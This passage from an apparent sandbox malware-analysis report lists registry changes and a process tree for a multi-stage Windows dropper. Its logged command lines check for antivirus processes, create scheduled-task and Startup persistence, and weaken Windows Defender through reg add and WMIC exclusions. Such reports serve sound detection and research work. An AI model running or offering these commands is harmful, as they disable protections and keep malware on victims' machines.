| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ff3ab8f7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
"C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4316,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 40365
C:\Windows\SysWOW64\findstr.exe
findstr /V "HopeBuildersGeniusIslam" Sonic
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
Beijing.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe
"C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 193997
C:\Windows\SysWOW64\findstr.exe
findstr /V "JulieAppMagneticWhenever" Hist
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
Restructuring.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 40365
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
Beijing.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=3052,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe
"C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe"
C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe
"C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC5FB.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe
.\Install.exe /sjJKLdidMdi "385133" /S
C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe
"C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPUvzXzfJRZdhTmsKY" /SC once /ST 22:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe\" wc /ydidAPN 385133 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Windows\SysWOW64\WerFault.exe
